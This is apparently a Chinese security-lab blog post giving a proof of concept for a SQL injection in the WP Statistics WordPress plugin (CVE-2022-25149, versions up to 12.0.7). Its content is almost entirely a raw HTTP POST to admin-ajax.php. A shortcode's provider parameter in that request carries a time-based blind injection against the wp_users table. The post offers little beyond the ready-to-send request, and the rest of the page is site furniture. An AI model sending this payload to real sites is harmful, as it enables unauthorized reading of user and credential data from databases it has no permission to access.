影响版本:WP Statistics <= 12.0.7
POC:
POST /blog/wp-admin/admin-ajax.php HTTP/1.1
Host: 172.16.169.165
Content-Length: 146
Accept: */*
Origin: http://172.16.169.165
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: wp-settings-time-1=1509063602; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_dbae2bea8cec00e99e96eee9845ba3c3=test%7C1509237085%7ClNvvUMTO7HTItRlXWZwvpYvHVvGtx2UBulpxGtPxoIN%7C5947a221f381e5b55fe2823de9c9f13e0f5aaf2f49b01fdce7cd7bb77f23bc4b; wp-settings-time-2=1509064285; PHPSESSID=8pskvhhq5ek01pbfmdabaqkjc5; security=high
action=parse-media-shortcode&shortcode=[wpstatistics stat=searches time=total provider="'union select 1,2,3,4,5,6 from wp_users where sleep(10)#"]![图片[1]-【初级】WP Statistics SQL注入 (CVE-2022-25149)-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/08/d2b5ca33bd091253.png)
本文作者:云云
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
![表情[chi]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/chi.gif)
![表情[xiaojiujie]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/xiaojiujie.gif)
![表情[weiqu]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/weiqu.gif)
![表情[qinqin]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/qinqin.gif)
![表情[leiben]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/leiben.gif)
![表情[baiyan]-NGC660安全实验室](http://ngc660.cn/wp-content/themes/zibll/img/smilies/baiyan.gif)
请登录后查看评论内容